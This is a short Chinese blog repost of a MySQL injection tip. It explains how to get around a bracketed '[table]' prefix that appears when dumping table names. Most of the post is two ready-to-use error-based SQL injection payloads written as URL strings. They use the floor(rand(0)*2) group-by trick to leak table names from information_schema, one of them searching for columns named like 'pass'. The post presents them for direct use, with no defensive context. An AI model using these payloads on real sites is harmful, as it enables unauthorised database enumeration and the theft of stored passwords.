码迷,mamicode.com
首页 > 数据库 > 详细

Mysql注入总结(三)

时间:2015-08-12 14:55:06      阅读:181      评论:0      收藏:0      [点我收藏+]

标签:sql injection

昨天整理点东西的时候看到了几年前以前收集的一篇文章,今天也就写两个字。

说的是爆表的时候出现[table]前缀,后来改用hex(),然后unhex()出现真正的表名


代码如下:

‘union+select+1+from+(select+count(*),concat(floor(rand(0)*2),0x3a,(select+table_name+from+information_schema.columns+where+table_schema=database()+and+column_name+like+‘%pass%‘+limit+0,1),0x3a)a+from+information_schema.tables+group+by+a)b#-1.html


‘union+select+1+from+(select+count(*),concat(floor(rand(0)*2),0x3a,(select+hex(table_name)+from+information_schema.tables+where+table_schema=database()+limit+48,1),0x3a)a+from+information_schema.tables+group++by+a)b#-1.html


原文:《MYSQL注入解决方括号[table]前缀问题》

Mysql注入总结(三)

标签:sql injection

原文地址:http://maxvision.blog.51cto.com/6269192/1683949

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!